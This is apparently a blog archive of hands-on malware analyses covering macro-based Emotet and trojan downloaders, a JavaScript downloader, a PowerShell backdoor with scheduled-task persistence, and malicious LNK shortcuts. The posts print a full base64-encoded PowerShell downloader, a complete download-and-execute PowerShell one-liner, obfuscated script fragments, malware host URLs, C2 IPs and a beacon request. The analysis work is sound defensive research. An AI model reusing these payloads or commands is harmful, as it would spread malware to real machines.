Category Archives: Malware Analysis

Trojan downloader word macro


SHA256 – 4221a9922d97fa329b3dbb27e37522448958cbfa186a6ef722e48d63f9753808

Download link – VirusTotal

I downloaded this word document and checked whether macro present and it auto executes on opening document.

Yes, it does and it has obfuscated strings too.

blg5-05132019.PNG

I opened document and navigated to > Views > Macros > View Macros > Selected “autoopen” > Edit

blg5-05132019-3.PNG

I renamed autoopen() to autoopen2. (Which you can see in above screenshot)

blg5-05132019-4.PNG

while debugging macro, found it executed PowerShell script in obfuscated form.

blg5-05132019-5

blg5-05132019-6.PNG

After deobfuscate, below is the PowerShell script.

blg5-05132019-7.PNG

On debugging PowerShell script, it tries to download 685.exe from one of below URL’s

blg5-05132019-9.png

blg5-05132019-8.PNG

http://duanlocphatresidence%5B.%5Dcom/wp-admin/b8oyf2_w724r5u-66253
http://superwhite%5B.%5Dcom%5B.%5Dau/wp-content/2t9x_bmoau88p-89600496
http://pneumorek%5B.%5Dma/calendar/EckAzvvl
http://pure-vapedistribution%5B.%5Dbe/p52r/js74mi_zk0p5orhwa-651
http://nitincarcare%5B.%5Dcom/wp-content/BbayinbUK

and drops PE file at location C:\Users\<user>\685.exe

blg5-05132019-10.png

While debugging PowerShell script, I tried to hit the download script but found none of above URL’s has PE file.

The file is removed from all URL’s.

Below is VirusTotal score.

blg5-05132019-11.PNG

 

Word macro drops Emotet malware


SHA256 : 1043dd7647105b035acbc027e0fa448f329ea5620956a1ba82dc254fc7bd6e29

I have downloaded word document for analysis from VirusTotal

I checked file with Oletools to verify macro exist and is it auto executable.

In below screenshot, it can be seen, the macro is present and auto executable.

Blg4-30042019-4.PNG

I opened word document and Enabled Editing.

Blg4-30042019.PNG

Views > Macros > View Macros > Select Autoopen > Edit

I renamed autoopen() to autoopen2() so it will not execute on document open.

I started debugging VBA and found base64 string which executes PowerShell script to download a malicious file from remote server.

Below is the base64 string used in macro

Blg4-30042019-1.PNG

JABRAEEAQQBBAFUAVQBDAD0AKAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIALQBmACAAJwBHAEcAJwAsACcAQQBDACcALAAoACIAewAxAH0AewAwAH0AIgAtAGYAJwBBAEMAJwAsACcAawBaACcAKQApADsAJAByAEcAQQBYAEEAQQBBAG8AIAA9ACAAJwA2ADAANAAnADsAJABDAEIAVQB3AHg ANABBAD0AKAAiAHsAMQB9AHsAMAB9AHsAMgB9ACIALQBmACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcAWABBACcALAAnAEcAQgAnACkALAAnAFEAJwApACwAJwBvACcALAAnAHgAYwAnACkAOwAkAHYAVQBfAG8AYwAxAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJAByAEcAQQBYAEEAQQBBAG8AKwAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAGUAeABlACcALAAnAC4AJwApADsAJABuAEMAMQBCAEMAMQA9ACgAIgB7ADEAfQB7ADIAfQB7ADAAfQAiAC0AZgAgACcAQgAnACwAJwBXAEEAJwAsACcAWABEAHgAJwApADsAJAB6AEEAQQBrAEIAQgA9AC4AKAAnAG4AZQB3AC0AJwArACcAbwBiACcAKwAnAGoAJwArACcAZQBjAHQAJwApACAATgBlAFQALgBgAFcAZQBCAGAAQwBsAEkAYABlAG4AdAA7ACQAUwBBAGsAXwBBAEIAQQA9ACgAIgB7ADEANQB9AHsAMwA5AH0AewAyADEAfQB7ADEAMQB9AHsANAA0AH0AewA0ADMAfQB7ADIANwB9AHsAMQA4AH0AewAyADQAfQB7ADQANQB9AHsAMwAxAH0AewA0ADYAfQB7ADMAOAB9AHsAMQAyAH0AewAzADUAfQB7ADIANQB9AHsAMgAzAH0AewAxADkAfQB7 ADQAfQB7ADQAMAB9AHsANAA5AH0AewA0ADcAfQB7ADEAfQB7ADQAOAB9AHsANwB9AHsAOAB9AHsAMQA3AH0AewAxADMAfQB7ADMANgB9AHsAMwA3AH0AewA1AH0AewAzADMAfQB7ADMAfQB7ADQAMQB9AHsANgB9AHsAMgB9AHsAMAB9AHsAOQB9AHsAMgA5AH0AewAxADYAfQB7ADMAMgB9AHsAMgAwAH0AewAyADIAfQB7ADQAMgB9AHsAMQAwAH0AewAyADgAfQB7ADMAMAB9AHsAMgA2AH0AewAxADQAfQB7ADMANAB9ACIAIAAtAGYAIAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAHMAJwAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAC8ATABvACcALAAnAEsAUwAnACkAKQAsACcAawAyAC8AJwAsACgAIgB7ADIAfQB7ADAAfQB7ADEAfQAiAC0AZgAgACcAcAAnACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAGEAJwAsACcAZwBlAC8AYwBzACcAKQAsACcALwAnACkALAAnAC4AJwAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwBlAHIAJwAsACcAcwBhACcAKQAsACcALgAnACkALAAnAG0AbQAnACwAJwBiAHMAJwAsACcAOgAnACwAJwAvACcALAAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAEAAaAB0ACcALAAnAC8AJwApACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwByAGUAJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAGUAJwAsACcALwAvAHQAJwApACkALAAnAC0ASQBaACcALAAnAHQAcAAnACwAJwBnACcALAAnADAANAAnACwAKAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIAIAAtAGYAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBwACcALAAnAGgAdAB0ACcAKQAsACcALwBiACcALAAnADoALwAnACkALAAnAGEAYwAnACwAKAAiAHsAMwB9AHsAMAB9AHsAMgB9AHsAMQB9ACIALQBmACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBwAGgAaQAnACwAJwBrAHUAbgBwACcAKQAsACcAbwAnACwAJwByACcALAAnAC8AJwApACwAJwBTADkAWAAnACwAJwBiACcALAAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAC8AUwAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAZQAvAEAAJwAsACcARwAnACkAKQAsACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiAC0AZgAgACgAIgB7ADIAfQB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBtAC8AJwAsACcAWABhACcALAAnAGMAbwAnACkALAAnAEsAJwAsACcAYQAnACkALAAnAGgAJwAsACcAYQAnACwAJwBfAHkASAAnACwAJwAvAC8AbAAnACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAGIAJwAsACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiAC0AZgAnAC8AaQAnACwAJwBlAHMAdAAnACwAJwA0ACcAKQApACwAJwB4ACcALAAnAGIAaQAuACcALAAoACIAewA0AH0AewAwAH0AewAxAH0AewAzAH0AewAyAH0AIgAtAGYAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBrAGUAZQAnACwAJwBiAHIAaQAnACkALAAnAC4AYwAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwB0ACcALAAnAC8AYwBvAG4AJwApACwAJwBvAG0AJwAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAHQAcAA6AC8AJwAsACcALwAnACkAKQAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACcAYwBvAG0AJwAsACcALwAnACkALAAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAGoALQBhACcALAAnADMAJwApACwAJwB0ACcALAAnAGkAbgBnACcALAAnAC8AJwAsACcAOgAnACwAJwByACcALAAnAGEAJwAsACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiAC0AZgAnAEAAaAB0ACcALAAnAC8AJwAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAUQAnACwAJwBzAEMASwAnACkAKQAsACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiAC0AZgAgACcAcwAnACwAJwBlAHkAJwAsACcAZQBsAC4AJwApACwAJwBjAG8AbQAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwAvACcALAAnAGMAbwBtACcAKQAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAHAAOgAnACwAJwB0AHQAJwApACwAKAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIAIAAtAGYAJwByACcALAAnAEEAbQAnACwAJwBzAGIAeQAnACkALAAnAFcAcQAnACwAKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAKAAiAHsAMAB9AHsAMQB9ACIALQBmACcAcgBqAHMAJwAsACcAagAnACkALAAnAGgARQAnACkALAAnAC8AdAAnACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwAvADkASgAnACwAJwBEACcAKQAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAQAAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAdAB0AHAAJwAsACcAaAAnACkAKQAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAHQAZQAnACwAJwAvAGgAbwAnACkALAAnAGwAJwApACkALgAiAHMAYABwAGwAaQB0ACIAKAAnAEAAJwApADsAJABZAEEAQwBBAEEAMQBHAD0AKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAWgAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwBBAEQAQQAnACwAJwBBACcAKQAsACcAaQB4ADEAJwApACkAOwBmAG8AcgBlAGEAYwBoACgAJABpAEEAQQBRAEIAQQBBACAAaQBuACAAJABTAEEAawBfAEEAQgBBACkAewB0AHIAeQB7ACQAegBBAEEAawBCAEIALgAiAGQAbwBgAFcATgBMAE8AQQBEAGAARgBgAEkATABlACIAKAAkAGkAQQBBAFEAQgBBAEEALAAgACQAdgBVAF8AbwBjADEAKQA7ACQAYgBBADEAXwBDAEEAPQAoACIAewAxAH0AewAwAH0AewAyAH0AIgAtAGYAJwBRAEcAJwAsACcAQgAnACwAJwBaAEEAMQAnACkAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQALQBJACcAKwAnAHQAZQBtACcAKQAgACQAdgBVAF8AbwBjADEAKQAuACIATABlAGAATgBnAFQASAAiACAALQBnAGUAIAAzADUANgAwADEAKQAgAHsALgAoACcASQBuAHYAbwBrAGUALQBJAHQAJwArACcAZQAnACsAJwBtACcAKQAgACQAdgBVAF8AbwBjADEAOwAkAEMAQQBRAF8AQQBCAD0AKAAiAHsAMAB9AHsAMQB9AHsAMgB9ACIAIAAtAGYAJwBPACcALAAnAEEAQgBEACcALAAnAEQAUQA0ACcAKQA7AGIAcgBlAGEAawA7ACQAegBHAFgAQQB4AGsARAA9ACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAoACIAewAwAH0AewAxAH0AIgAtAGYAJwB3ACcALAAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBBAEQAWABjACcALAAnAFEAJwApACkALAAnAEEAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABYAFEAQQAxAFgAQQBBAD0AKAAiAHsAMAB9AHsAMQB9ACIALQBmACcAZgBBACcALAAoACIAewAxAH0AewAyAH0AewAwAH0AIgAgAC0AZgAnAEEAMQAnACwAJwBHAHgAJwAsACcARABBACcAKQApAA==

After decoding base64 string, I got below PowerShell script.

Blg4-30042019-2.PNG

On debugging PowerShell script, I found, it downloads 604.exe file from one of multiple sources and drop at location C:\Users\<username>\604.exe

Blg4-30042019-5.PNG

below are the URL from where it tries to download the malicious executable file.

Blg4-30042019-7.PNG

http[:]// beysel[.]com/XaaK-IZWqrsbyAmxS9X_yHrjsjhEj-a3/tQsCK/
http[:]// labersa[.]com/hotel/9JDk2/
http[:]// phikunprogramming[.]com/bs/page/css/LoKS/
http[:]// brikee[.]com/contact/SGe/
http[:]// terebi[.]com/best/i404/

I got this file at location C:\Users\<username>\604.exe

Below is 604.exe file version.

Blg4-30042019-6.PNG

Below is SHA for this executable.

SHA256 – 48260C3FFE79F8CF498502778C192A2CFCA7B69866141A9A88FA75B0D0093557

Here is [VirusTotal link]

This is executable is Emotet.

 

Trojan- JS downloader


I have downloaded JS trojan downloader from VirusSign  to analyze behavior of this malware. It was a zip file INC_0987155124US_Apr_19_2019.zip and after extracting it, I got .js file.

On opening JS file in notepad, i saw base64 obfuscated string. After obfuscation JS script, I found, this file has multiple sources/ URL’s to download  SHA256- d6798b62cef08c4f61a30dfa346faf5aa29f9d03e4599ebe5ae910a193087b86

Below are  the URL’s used in JS to download malicious executable files.

Blg3_20042019_4

Below is JS code where it goes to the URL to check whether it’s up else will check another URL to get the malware downloaded on user’s machine.

Blg3_20042019_7

I tried to accessed all four URL’s used in JS script and could able to download malicious .exe files from three of them. One URL was inaccessible.

Blg3_20042019_2.PNG

Below are executable files downloaded from URL’s.

Blg3_20042019_3

When I checked the version and hash of all three files, all were same.

Blg3_20042019_6

Behavior of executable file:

On execution, file get created under C:\Windows\SysWow64 directory under name sourcematrix.exe. 

Blg3_20042019_8

and it also adds to the windows services (services.msc).

Blg3_20042019_9.PNG

Wireshark log shows this malware executable connects to IP address 5[.]230[.]147[.]179

Blg3_20042019_12.PNG

Below is malicious executable file hash

SHA256: D6798B62CEF08C4F61A30DFA346FAF5AA29F9D03E4599EBE5AE910A193087B86

Thank you.

Word Macro backdoor Trojan


I came across this sample from one of Twitter post and immediately I downloaded this sample from virusbay.io  for analysis.

First I used oleTools to analyse word macro.

  • Macro will execute on opening file.
  • It creates text file.
  • It executes PowerShell command.
  • it has base64 used to obfuscate the string.
  • And it creates two bat files which will execute PowerShell script.

blg2-04150-1

blg2-04150-2.PNG

Below screenshots of word document

blg2-04150-3

blg2-04150-5.PNG

When I clicked on Enable Editing and Edit Macro, A pop came up and asking for password. Which I didn’t know and I clicked on Cancel button but macro executed.

blg2-04150-13

blg2-04150-14.PNG

While performing this action, I was running Sysinternal’s Autoruns  and Process Monitor to capture the background activity.

And found word document dropped files at location C:\ProgramData file names are

  • Win32ApiSync.bat 
  • Win32ApiSyncLog.txt

blg2-04150-11

and dropped another file at location Startup programs.

  • Win32ApiSyncTskSchdlr.bat

blg2-04150-10

Win32ApiSyngTskSchDlr.bat file will execute Win32ApiSync.bat file and add it task scheduler for running 1 hourly basis.

blg2-04150-8

and Win32ApiSync.bat file will decode base64 obfuscated string stored in file Win32ApiSyncLog.txt. 

blg2-04150-9

You can read Win32ApiSyncLog.txt file data here Pastebin

I used below PowerShell script to decode  Base64 obfuscated string and written it to text file which was actually a PowerShell script.

blg2-04150-15.PNG

Decoded base64 string you can read here at Pastebin and below is the screenshot of decoded string which is PowerShell script.

blg2-04150-16.PNG

Above decoded PowerShell has another base64 obfuscated string (start of string highlighted in yellow) which i decoded again using same PowerShell script (above screenshot) and output text you can find here on Pastebin

It has Chinese like characters which I was unable to decode/translate and because of this i thought to run this PowerShell to see the behavior.

I executed Win32ApiSyncTskSchdlr.bat file and saw that this file created a task scheduler job and schedule Win32ApiSync.bat file triggering every 1 hour.

I found this information in Sysinternal’s Autoruns tool

blg2-04150-18

Below is the task scheduler job.

blg2-04150-19

I also could find the files getting dropped at below locations and file names are

  • 6772.xml
  • AutoSaved_17e74b3e-413b-498a-a922-8f04498c1d4a_Untitled2.ps1
  • AutoSaved_d40bd1dc-5457-4e11-85d5-b31138ee3b48_Untitled3.ps1
  • Userconfig.xml

blg2-04150-17

6772.xml file data

blg2-04150-24

connection has made to remote IP 94[.]23[.]148[.]194 and post request has made.

blg2-04150-23

below is the post command

POST /serverScript/clientFrontLine/helloServer.php?helloMsg=NzgtNEEtQjAtNEYtNDEtMzAtRTUtNTAtM0MtMDYtNDItQUMtNzYtRjQtODYtOEUqNDAzMzQwMzMq%0D%0Ac2NydEFnbnQxLjEqTWljcm9zb2Z0IFdpbmRvd3MgMTAgRW50ZXJwcmlzZSBFdmFsdWF0aW9uKjY0%0D%0ALWJpdCpNU0VER0VXSU4xMCpXT1JLR1JPVVAqTVNFREdFV0lOMTBcSUVVc2VyKjEyNy4wLjAuMQ==,NzgtNEEtQjAtNEYtNDEtMzAtRTUtNTAtM0MtMDYtNDItQUMtNzYtRjQtODYtOEUqNDAzMzQwMzMq%0D%0Ac2NydEFnbnQxLjEqTWljcm9zb2Z0IFdpbmRvd3MgMTAgRW50ZXJwcmlzZSBFdmFsdWF0aW9uKjY0%0D%0ALWJpdCpNU0VER0VXSU4xMCpXT1JLR1JPVVAqTVNFREdFV0lOMTBcSUVVc2VyKjEyNy4wLjAuMQ==,NzgtNEEtQjAtNEYtNDEtMzAtRTUtNTAtM0MtMDYtNDItQUMtNzYtRjQtODYtOEUqNDAzMzQwMzMq%0D%0Ac2NydEFnbnQxLjEqTWljcm9zb2Z0IFdpbmRvd3MgMTAgRW50ZXJwcmlzZSBFdmFsdWF0aW9uKjY0%0D%0ALWJpdCpNU0VER0VXSU4xMCpXT1JLR1JPVVAqTVNFREdFV0lOMTBcSUVVc2VyKjEyNy4wLjAuMQ==,NzgtNEEtQjAtNEYtNDEtMzAtRTUtNTAtM0MtMDYtNDItQUMtNzYtRjQtODYtOEUqNDAzMzQwMzMq%0D%0Ac2NydEFnbnQxLjEqTWljcm9zb2Z0IFdpbmRvd3MgMTAgRW50ZXJwcmlzZSBFdmFsdWF0aW9uKjY0%0D%0ALWJpdCpNU0VER0VXSU4xMCpXT1JLR1JPVVAqTVNFREdFV0lOMTBcSUVVc2VyKjEyNy4wLjAuMQ==,NzgtNEEtQjAtNEYtNDEtMzAtRTUtNTAtM0MtMDYtNDItQUMtNzYtRjQtODYtOEUqNDAzMzQwMzMq%0D%0Ac2NydEFnbnQxLjEqTWljcm9zb2Z0IFdpbmRvd3MgMTAgRW50ZXJwcmlzZSBFdmFsdWF0aW9uKjY0%0D%0ALWJpdCpNU0VER0VXSU4xMCpXT1JLR1JPVVAqTVNFREdFV0lOMTBcSUVVc2VyKjEyNy4wLjAuMQ==,NzgtNEEtQjAtNEYtNDEtMzAtRTUtNTAtM0MtMDYtNDItQUMtNzYtRjQtODYtOEUqNDAzMzQwMzMq%0D%0Ac2NydEFnbnQxLjEqTWljcm9zb2Z0IFdpbmRvd3MgMTAgRW50ZXJwcmlzZSBFdmFsdWF0aW9uKjY0%0D%0ALWJpdCpNU0VER0VXSU4xMCpXT1JLR1JPVVAqTVNFREdFV0lOMTBcSUVVc2VyKjEyNy4wLjAuMQ==,NzgtNEEtQjAtNEYtNDEtMzAtRTUtNTAtM0MtMDYtNDItQUMtNzYtRjQtODYtOEUqNDAzMzQwMzMq%0D%0Ac2NydEFnbnQxLjEqTWljcm9zb2Z0IFdpbmRvd3MgMTAgRW50ZXJwcmlzZSBFdmFsdWF0aW9uKjY0%0D%0ALWJpdCpNU0VER0VXSU4xMCpXT1JLR1JPVVAqTVNFREdFV0lOMTBcSUVVc2VyKjEyNy4wLjAuMQ==,NzgtNEEtQjAtNEYtNDEtMzAtRTUtNTAtM0MtMDYtNDItQUMtNzYtRjQtODYtOEUqNDAzMzQwMzMq%0D%0Ac2NydEFnbnQxLjEqTWljcm9zb2Z0IFdpbmRvd3MgMTAgRW50ZXJwcmlzZSBFdmFsdWF0aW9uKjY0%0D%0ALWJpdCpNU0VER0VXSU4xMCpXT1JLR1JPVVAqTVNFREdFV0lOMTBcSUVVc2VyKjEyNy4wLjAuMQ==,NzgtNEEtQjAtNEYtNDEtMzAtRTUtNTAtM0MtMDYtNDItQUMtNzYtRjQtODYtOEUqNDAzMzQwMzMq%0D%0Ac2NydEFnbnQxLjEqTWljcm9zb2Z0IFdpbmRvd3MgMTAgRW50ZXJwcmlzZSBFdmFsdWF0aW9uKjY0%0D%0ALWJpdCpNU0VER0VXSU4xMCpXT1JLR1JPVVAqTVNFREdFV0lOMTBcSUVVc2VyKjEyNy4wLjAuMQ==,NzgtNEEtQjAtNEYtNDEtMzAtRTUtNTAtM0MtMDYtNDItQUMtNzYtRjQtODYtOEUqNDAzMzQwMzMq%0D%0Ac2NydEFnbnQxLjEqTWljcm9zb2Z0IFdpbmRvd3MgMTAgRW50ZXJwcmlzZSBFdmFsdWF0aW9uKjY0%0D%0ALWJpdCpNU0VER0VXSU4xMCpXT1JLR1JPVVAqTVNFREdFV0lOMTBcSUVVc2VyKjEyNy4wLjAuMQ==,NzgtNEEtQjAtNEYtNDEtMzAtRTUtNTAtM0MtMDYtNDItQUMtNzYtRjQtODYtOEUqNDAzMzQwMzMq%0D%0Ac2NydEFnbnQxLjEqTWljcm9zb2Z0IFdpbmRvd3MgMTAgRW50ZXJwcmlzZSBFdmFsdWF0aW9uKjY0%0D%0ALWJpdCpNU0VER0VXSU4xMCpXT1JLR1JPVVAqTVNFREdFV0lOMTBcSUVVc2VyKjEyNy4wLjAuMQ==,NzgtNEEtQjAtNEYtNDEtMzAtRTUtNTAtM0MtMDYtNDItQUMtNzYtRjQtODYtOEUqNDAzMzQwMzMq%0D%0Ac2NydEFnbnQxLjEqTWljcm9zb2Z0IFdpbmRvd3MgMTAgRW50ZXJwcmlzZSBFdmFsdWF0aW9uKjY0%0D%0ALWJpdCpNU0VER0VXSU4xMCpXT1JLR1JPVVAqTVNFREdFV0lOMTBcSUVVc2VyKjEyNy4wLjAuMQ==,NzgtNEEtQjAtNEYtNDEtMzAtRTUtNTAtM0MtMDYtNDItQUMtNzYtRjQtODYtOEUqNDAzMzQwMzMq%0D%0Ac2NydEFnbnQxLjEqTWljcm9zb2Z0IFdpbmRvd3MgMTAgRW50ZXJwcmlzZSBFdmFsdWF0aW9uKjY0%0D%0ALWJpdCpNU0VER0VXSU4xMCpXT1JLR1JPVVAqTVNFREdFV0lOMTBcSUVVc2VyKjEyNy4wLjAuMQ==,NzgtNEEtQjAtNEYtNDEtMzAtRTUtNTAtM0MtMDYtNDItQUMtNzYtRjQtODYtOEUqNDAzMzQwMzMq%0D%0Ac2NydEFnbnQxLjEqTWljcm9zb2Z0IFdpbmRvd3MgMTAgRW50ZXJwcmlzZSBFdmFsdWF0aW9uKjY0%0D%0ALWJpdCpNU0VER0VXSU4xMCpXT1JLR1JPVVAqTVNFREdFV0lOMTBcSUVVc2VyKjEyNy4wLjAuMQ==,NzgtNEEtQjAtNEYtNDEtMzAtRTUtNTAtM0MtMDYtNDItQUMtNzYtRjQtODYtOEUqNDAzMzQwMzMq%0D%0Ac2NydEFnbnQxLjEqTWljcm9zb2Z0IFdpbmRvd3MgMTAgRW50ZXJwcmlzZSBFdmFsdWF0aW9uKjY0%0D%0ALWJpdCpNU0VER0VXSU4xMCpXT1JLR1JPVVAqTVNFREdFV0lOMTBcSUVVc2VyKjEyNy4wLjAuMQ==,NzgtNEEtQjAtNEYtNDEtMzAtRTUtNTAtM0MtMDYtNDItQUMtNzYtRjQtODYtOEUqNDAzMzQwMzMq%0D%0Ac2NydEFnbnQxLjEqTWljcm9zb2Z0IFdpbmRvd3MgMTAgRW50ZXJwcmlzZSBFdmFsdWF0aW9uKjY0%0D%0ALWJpdCpNU0VER0VXSU4xMCpXT1JLR1JPVVAqTVNFREdFV0lOMTBcSUVVc2VyKjEyNy4wLjAuMQ==,NzgtNEEtQjAtNEYtNDEtMzAtRTUtNTAtM0MtMDYtNDItQUMtNzYtRjQtODYtOEUqNDAzMzQwMzMq%0D%0Ac2NydEFnbnQxLjEqTWljcm9zb2Z0IFdpbmRvd3MgMTAgRW50ZXJwcmlzZSBFdmFsdWF0aW9uKjY0%0D%0ALWJpdCpNU0VER0V

another http request I see in wireshark is 414 Request-URI too long and host is HANGER[]mobinhost[.]com port 80

blg2-04150-22

One more file created at location C:\ProgramData\error.txt

File has logs which saying “unable to connect to remote server.” (This may be when I disconnected from Internet) and another error was logged is “Invalid URI: The Uri string is too long.”

blg2-04150-25

I renamed all dropped bat files, PowerShell scripts and text file and tried to access the IP address via browser.

blg2-04150-27

blg2-04150-28.PNG

Behavior of Malware: 

  • On opening word document, drops Batch files and which executes PowerShell script from base64 obfuscated string.
  • Batch files creates a task scheduler jobs which executes every hour.
  • From the error logs and WireShark network logs, it seems it upload data to IP 94[.]23[.]148[.]194

 

Files dropped on system:

  • C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Win32ApiSyncTskSchdlr.bat
  • C:\ProgramData\Win32ApiSync.bat
  • C:\ProgramData\Win32ApiSyncLog.txt
  • C:\Users\IEUser\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\user.config
  • C:\Users\IEUser\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveFiles\AutoSaved_17e74b3e-413b-498a-a922-8f04498c1d4a_Untitled2.ps1
  • C:\Users\IEUser\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveFiles\AutoSaved_d40bd1dc-5457-4e11-85d5-b31138ee3b48_Untitled3.ps1
  • C:\Users\IEUser\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\6772.xml

 

Suggestions are welcome. Thank you.

Trojan malware – Microsoft Shortcut (LNK)


I downloaded this sample for malware analysis and change the extension to .LNK which is Microsoft Shortcut.

Right clicked on file and navigated to shortcut and found that there is target is PowerShell embedded

blg-2

Below is PowerShell script which will drop another PowerShell script from the URL.

URL is http[:]// timebounder[.]ru and downloading PowerShell script pps[.]ps1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Exec bypass -windo 1 $je=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(‘aWV4’));sal calc $je;$mM=((New-Object Net.WebClient)).DownloadString(‘http[:]//timebounder[.]ru/ pps.ps1’);calc $mM

blg-3

I tried running script but the website is down (http[:]// timebounder[.]ru) and unable to download PowerShell script.

Virustotal – https://www.virustotal.com/#/file/4e69c30090d67980721c36c655116e7f77059672606dfd9dc28206c0472fee98/detection

SHA256 – 4e69c30090d67980721c36c655116e7f77059672606dfd9dc28206c0472fee98

 

Microsoft Shortcut (LNK) trojan malware


I have downloaded this Microsoft shortcut malicious sample from Virustotal for analysis

After downloading, I renamed as sample.lnk. (Microsoft shortcut extension .LNK)

When I opened properties tab of this file, found below properties which clearly shows its now shortcut of any application but a PowerShell script which executed on opening.

  • Target Type: Application
  • Target: PowerShell scrip
  • Description: Windows PowerShell

b4_4

b4_1

 

I copied and pasted PowerShell script to text file.

b4_2

Behavior of PowerShell script:

  • Download another PowerShell script out-763347625.ps1 from URL https[:]// latinotca-ar[.]com

I double click on it to check the behavior, a command prompt windows opened and closed.

I could see the PowerShell script executed and tried to connect to the URL. WireShark captured the network traffic.

b4_3.PNG

b4_5

 

The web site has taken down. I tried to open the URL in browser, URL is inaccessible.

VIrusTotal sample:

SHA-256: 5c5c2c6197d4b1c24c438b8fb0452257c9e4085ac59297a985ec92ef1720b74d

 

Emotet malware analysis


VirusTotal sample – c9bdfb2d6ac9e493bc391b2f64b48d8d5cde10645ea921951b23112e6d73545c

File Type: Microsoft Word Document

Document Property:

I have used Oletools to analyse word document properties and analyse content.

wm2.PNG

wm3.PNG

This word document has VBA macros.

After parsing word document using olevba, this tells, file has suspicious hex string and Base64 strings.

And file has below macros,

  • LUDoB_BX.cls
  • fkkkCAk.bas
  • ZAAcAA.bas

And macros will auto execute on opening document

wm4.PNG

I start debugging macros in word document,

wm5.PNG

After Enable Editing, Open View Macros under View tab

wm6

wm7

Click on Edit and change autoopen() function to autoopen2().

wm8

There are many small chunks of Base64 strings which  are concatenating and creating a PowerShell script I have captured the Base64 string in text file and tried to decode. I didn’t get the complete base64 but some part of it and can be recognized it is PowerShell script.

wm14.PNG

(nEw-OBJECt sySTeM.Io.comPReSsIOn.dEfLatEstReAM( [Io.mEMORystREam] [coNverT]::FrOMbase64stRING((‘ZZJh’+’i’+’5’+’tAEIb/y’+’n’+’4’+’QNiFVz9YP5US4MbYSS’+’gOmhLN’+’H’+’QXQz’+’6kbd9XSjOUL’+’+e’+’zdtJbSdb7s87z’+’vDO2’+’O8g’+’q5’+’z4P’+’r0E’+’EA’+’an8’+’OI’+’esbXKA5TGfoCJ1PmR2SK’+’bFFZz5ivG45’+’CecZrKJMA’+’wKeV’+’Ut2jbW’+’M’+’7
IArsj9xisrWnzmRSKI3’+’a’+’u’+’9’+’2Xk/10wwbNVRmTQ6npG’+’csO’+’LRe24’+’zjuHZq’+’m’+’yaoy’+’c’+’chPvF’+’F’+’Z1w3/e’+’k4’+’f’+’FLs9Cl’+’7aT’+’v5’+’b+EfXv2Wi63FQv’+’zSs5Gau/Y/’+’tJ’+’7m9N’+’xiwH3nBR/’+’zPeDdubW’+’p96xquFvSJLj1j1Pk44’+’L74N’+’N’+’iDT

during debugging, I got the below values are stored in the variable YAAAAAA and it is reading registry key values.

wm9

wm10

wm13.PNG

while debugging, I captured traffic using WireShark and found, connection has been made to web site emseenerji[.]com at IP 94[.]73[.]147[.]237. URL is still alive and can be accessed.

wm11.PNG

wm12.PNG

The complete URL which was accessed by this program http:// emseenerji[.]com/wp-content/RRKu/

My host machine AV blocked this URL and I couldn’t analyze traffic further from this URL to my VM.

Thank you.

« Older Entries